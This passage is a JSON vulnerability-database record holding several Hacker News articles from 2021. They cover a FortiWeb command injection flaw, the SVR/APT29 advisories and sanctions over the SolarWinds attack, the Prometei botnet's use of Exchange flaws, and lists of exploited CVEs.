Backdoor Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "modified": "2020-02-18T15:13:08", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:13", "description": "[](<https://thehackernews.com/images/-iRDFz4kb2_c/YRyAnCXcgbI/AAAAAAAADjw/9zUdSCDaZ3wAdT6A32p1ugpUnmn7m6WagCLcBGAsYHQ/s0/Fortinet-zero-day.jpg>)\n\nDetails have emerged about a new unpatched security vulnerability in Fortinet's web application firewall (WAF) appliances that could be abused by a remote, authenticated attacker to execute malicious commands on the system.\n\n\"An OS command injection vulnerability in FortiWeb's management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page,\" cybersecurity firm Rapid7 [said](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) in an advisory published Tuesday. \"This vulnerability appears to be related to [CVE-2021-22123](<https://nvd.nist.gov/vuln/detail/CVE-2021-22123>), which was addressed in [FG-IR-20-120](<https://www.fortiguard.com/psirt/FG-IR-20-120>).\"\n\nRapid7 said it discovered and reported the issue in June 2021. Fortinet is expected to release a patch at the end of August with version Fortiweb 6.4.1.\n\nThe command injection flaw is yet to be assigned a CVE identifier, but it has a severity rating of 8.7 on the CVSS scoring system. Successful exploitation of the vulnerability can allow authenticated attackers to execute arbitrary commands as the root user on the underlying system via the SAML server configuration page.\n\n\"An attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\" Rapid7's Tod Beardsley said. \"They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ.\"\n\nRapid7 also warns that while authentication is a prerequisite for achieving arbitrary command execution, the exploit could be chained with an authentication bypass flaw, such as [CVE-2020-29015](<https://nvd.nist.gov/vuln/detail/CVE-2020-29015>). In the interim, users are advised to block access to the FortiWeb device's management interface from untrusted networks, including taking steps to prevent direct exposure to the internet.\n\nAlthough there is no evidence that the new security issue has been exploited in the wild, it's worth noting that unpatched Fortinet servers have been a lucrative target for financially motivated and state-sponsored threat actors alike.\n\nEarlier this April, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://www.ic3.gov/Media/News/2021/210402.pdf>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) to compromise systems belonging to government and commercial entities.\n\nIn the same month, Russian cybersecurity company Kaspersky [revealed](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) that threat actors exploited the CVE-2018-13379 vulnerability in FortiGate VPN servers to gain access to enterprise networks in European countries to deploy the Cring ransomware.\n\n**_Update: _**Fortinet shared the following statement with The Hacker News:\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the Fortinet PSIRT Policy page, which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. As such, we had expected that Rapid7 hold any findings prior to the end of our 90-day Responsible disclosure window. We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window. We are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week.\u201d\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-18T03:41:00", "type": "thn", "title": "Unpatched Remote Hacking Flaw Disclosed in Fortinet's FortiWeb WAF", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-19T06:50:20", "id": "THN:FCBB400B24C7B24CD6B5136FA8BE38D3", "href": "https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/-aP3rCXOUpiQ/YIfVcfAWodI/AAAAAAAACX8/f_RfGI2QOewvk7Zu4AaGOKQyirlBpfKfACLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities.\n\nBy employing \"stealthy intrusion tradecraft within compromised networks,\" the intelligence agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/26/fbi-dhs-cisa-joint-advisory-russian-foreign-intelligence-service>), \"the SVR activity\u2014which includes the recent [SolarWinds Orion supply chain compromise](<https://thehackernews.com/2021/04/researchers-find-additional.html>)\u2014primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information.\"\n\nThe cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. sanctioned Russia and [formally pinned](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) the SolarWinds hack and related cyberespionage campaign to government operatives working for SVR.\n\n[APT29](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt_29>), since emerging on the threat landscape in 2013, has been tied to a number of attacks orchestrated with an aim to gain access to victim networks, move within victim environments undetected, and extract sensitive information. But in a noticeable shift in tactics in 2018, the actor moved from deploying malware on target networks to striking cloud-based email services, a fact borne by the SolarWinds attack, wherein the actor leveraged Orion binaries as an intrusion vector to exploit Microsoft Office 365 environments.\n\nThis similarity in post-infection tradecraft with other SVR-sponsored attacks, including in the manner the adversary laterally moved through the networks to obtain access to email accounts, is said to have played a huge role in attributing the SolarWinds campaign to the Russian intelligence service, despite a notable departure in the method used to gain an initial foothold.\n\n\"Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations,\" the agency noted.\n\nAmong some of the other tactics put to use by APT29 are password spraying (observed during a 2018 compromise of a large unnamed network), exploiting zero-day flaws against virtual private network appliances (such as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) to obtain network access, and deploying a Golang malware called [WELLMESS](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) to plunder [intellectual property](<https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html>) from multiple organizations involved in COVID-19 vaccine development.\n\nBesides CVE-2019-19781, the threat actor is known to gain initial footholds into victim devices and networks by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>), [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), and [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>). Also in the mix is the practice of obtaining virtual private servers via false identities and cryptocurrencies, and relying on temporary VoIP telephone numbers and email accounts by making use of an anonymous email service called cock.li.\n\n\"The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services,\" the advisory read, while also urging businesses to secure their networks from a compromise of trusted software.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-27T09:14:00", "type": "thn", "title": "FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-28T06:42:30", "id": "THN:91A2A296EF8B6FD5CD8B904690E810E8", "href": "https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:20", "description": "[](<https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg>)\n\nThe U.S. and U.K. on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services.\n\n[](<https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg>)\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, SVR, and Russia's Federal Security Service (FSB).\n\n\"As a company, we deny the groundless accusations made by the U.S. Department of the Treasury,\" Positive Technologies [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-official-statement-following-u-s-sanctions/>) in a statement. \"In the almost 20 years we have been operating there has been no evidence of the results of Positive Technologies\u2019 research being used in violation of the principles of business transparency and the ethical exchange of information with the professional information security community.\"\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value accounts and assets.\n\n[](<https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg>)\n\nThe adversary's compromise of the SolarWinds software supply chain is said to have given it the ability to remotely spy or potentially disrupt more than 16,000 computer systems worldwide, according to the [executive order](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) issued by the U.S. government.\n\nBesides infiltrating the networks of [Microsoft](<https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html>), [FireEye](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>), [Malwarebytes](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>), and [Mimecast](<https://thehackernews.com/2021/03/mimecast-finds-solarwinds-hackers-stole.html>), the attackers are also said to have used SolarWinds as a stepping stone to breaching several U.S. agencies such as the National Aeronautics and Space Administration (NASA), the Federal Aviation Administration (FAA), and the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.\n\nThe SVR actor is also known by other names such as APT29, Cozy Bear, and The Dukes, with the threat group being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).\n\n[](<https://thehackernews.com/images/-JJfhuyyCe1A/YHhoT2JBRoI/AAAAAAAACSg/KKZjhhWheAYDqRlyZsylSiqZ6TohQDq4ACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nFurthermore, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>), warning businesses of active exploitation of five publicly known vulnerabilities by APT29 to gain initial footholds into victim devices and networks \u2014 \n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway \n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\nIn a statement shared with The Hacker News, Pulse Secure said the issue identified by the NSA concerns a flaw that was patched on [legacy deployments in April 2019](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), and that \"customers who followed the instructions in a Pulse Secure security advisory issued at that time have properly protected their systems and mitigated the threat.\"\n\n\"We see what Russia is doing to undermine our democracies,\" said U.K. Foreign Secretary Dominic Raab. \"The U.K. and U.S. are calling out Russia's malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-15T16:55:00", "type": "thn", "title": "US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-04T10:27:04", "id": "THN:461B7AEC7D12A32B4ED085F0EA213502", "href": "https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/---oICK3YQu8/YIJ50RG8cxI/AAAAAAAACWY/KkCLoHke1SsfzdcENBXnq3d4jAZlau0ggCLcBGAsYHQ/s0/malware.jpg>)\n\nAttackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines to a cryptocurrency botnet named Prometei, according to new research.\n\n\"Prometei exploits the recently disclosed Microsoft Exchange vulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and more,\" Boston-based cybersecurity firm Cybereason [said](<https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities>) in an analysis summarizing its findings.\n\nFirst documented by Cisco Talos in July 2020, [Prometei](<https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html>) is a multi-modular botnet, with the actor behind the operation employing a wide range of specially-crafted tools and known exploits such as EternalBlue and BlueKeep to harvest credentials, laterally propagate across the network and \"increase the amount of systems participating in its Monero-mining pool.\"\n\n\"Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload based on the detected operating system, on the targeted infected machines when spreading across the network,\" Cybereason senior threat researcher Lior Rochberger said, adding it's \"built to interact with four different command-and-control (C2) servers which strengthens the botnet's infrastructure and maintains continuous communications, making it more resistant to takedowns.\"\n\nThe intrusions take advantage of the recently patched vulnerabilities in [Microsoft Exchange Servers](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) with the goal of abusing the processing power of the Windows systems to mine Monero.\n\nIn the attack sequence observed by the firm, the adversary was found exploiting Exchange server flaws CVE-2021-27065 and CVE-2021-26858 as an initial compromise vector to install the China Chopper web shell and gain backdoor ingress to the network. With this access in place, the threat actor launched PowerShell to download the initial Prometei payload from a remote server. \n\n[](<https://thehackernews.com/images/-QPt-u63tvwA/YIJ6AaW7GPI/AAAAAAAACWg/z8_YGp_eggY-c6gUKoOyrf5D3cZtnDdzwCLcBGAsYHQ/s0/malware.jpg>)\n\nRecent versions of the bot module come with backdoor capabilities that support an extensive set of commands, including an additional module called \"Microsoft Exchange Defender\" that masquerades as a legitimate Microsoft product, which likely takes care of removing other competing web shells that may be installed on the machine so that Prometei gets access to the resources necessary to mine cryptocurrency efficiently.\n\nInterestingly, newly unearthed evidence gathered from [VirusTotal](<https://www.virustotal.com/gui/file/cf542ada135ee3edcbbe7b31003192c75295c7eff0efe7593a0a0b0f792d5256/details>) [artifacts](<https://www.virustotal.com/gui/file/fdcf4887a2ace73b87d1d906b23862c0510f4719a6c159d1cde48075a987a52f/details>) has revealed that the botnet may have been around as early as May 2016, implying that the malware has constantly been evolving ever since, adding new modules and techniques to its capabilities.\n\nPrometei has been observed in a multitude of victims spanning across finance, insurance, retail, manufacturing, utilities, travel, and construction sectors, compromising networks of entities located in the U.S., U.K., and several countries in Europe, South America, and East Asia, while also explicitly avoiding infecting targets in former [Soviet bloc](<https://en.wikipedia.org/wiki/Eastern_Bloc>) countries.\n\nNot much is known about the attackers other than the fact that they are Russian speaking, with older versions of Prometei having their language code set as \"Russian.\" A separate Tor client module used to communicate with a Tor C2 server included a configuration file that's configured to avoid using several exit nodes located in Russia, Ukraine, Belarus, and Kazakhstan.\n\n\"Threat actors in the cybercrime community continue to adopt APT-like techniques and improve efficiency of their operations,\" Rochberger said. \"As observed in the recent Prometei attacks, the threat actors rode the wave of the recently discovered Microsoft Exchange vulnerabilities and exploited them in order to penetrate targeted networks.\"\n\n\"This threat poses a great risk for organizations, since the attackers have absolute control over the infected machines, and if they wish so, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints,\" she added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-23T07:42:00", "type": "thn", "title": "Prometei Botnet Exploiting Unpatched Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-23T15:00:17", "id": "THN:F2A3695D04A2484E069AC407E754A9C1", "href": "https://thehackernews.com/2021/04/prometei-botnet-exploiting-unpatched.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:15", "description": "[](<https://thehackernews.com/images/-W51kRhVBeW0/YJaCznsmgiI/AAAAAAAACfU/z7fgy604zAcZllL9m6sPApy3bUHHX9YEQCLcBGAsYHQ/s0/hacker.jpg>)\n\nCyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous [public disclosures](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) of their attack methods, according to a [new advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>) jointly published by intelligence agencies from the U.K. and U.S. Friday.\n\n\"SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders,\" the National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>).\n\nThese include the deployment of an open-source tool called [Sliver](<https://github.com/BishopFox/sliver>) to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities.\n\nThe development follows the [public attribution](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) of SVR-linked actors to the [SolarWinds](<https://thehackernews.com/2021/04/researchers-find-additional.html>) supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium.\n\nThe attribution was also accompanied by a technical report detailing five vulnerabilities that the SVR's APT29 group was using as initial access points to infiltrate U.S. and foreign entities.\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway\n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\n\"The SVR targets organisations that align with Russian foreign intelligence interests, including governmental, think-tank, policy and energy targets, as well as more time bound targeting, for example [COVID-19 vaccine](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>) targeting in 2020,\" the NCSC said.\n\nThis was followed by a separate guidance on April 26 that [shed more light](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) on the techniques used by the group to orchestrate intrusions, counting password spraying, exploiting zero-day flaws against virtual private network appliances (e.g., CVE-2019-19781) to obtain network access, and deploying a Golang malware called WELLMESS to plunder intellectual property from multiple organizations involved in COVID-19 vaccine development.\n\nNow according to the NCSC, seven more vulnerabilities have been added into the mix, while noting that APT29 is likely to \"rapidly\" weaponize recently released public vulnerabilities that could enable initial access to their targets.\n\n * [**CVE-2019-1653**](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) \\- Cisco Small Business RV320 and RV325 Routers\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) \\- Oracle WebLogic Server\n * [**CVE-2019-7609**](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) \\- Kibana\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) \\- F5 Big-IP\n * [**CVE-2020-14882**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) \\- Oracle WebLogic Server\n * [**CVE-2021-21972**](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) \\- VMware vSphere\n * [**CVE-2021-26855**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) \\- Microsoft Exchange Server\n\n\"Network defenders should ensure that security patches are applied promptly following CVE announcements for products they manage,\" the agency said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-08T12:24:00", "type": "thn", "title": "Top 12 Security Flaws Russian Spy Hackers Are Exploiting in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 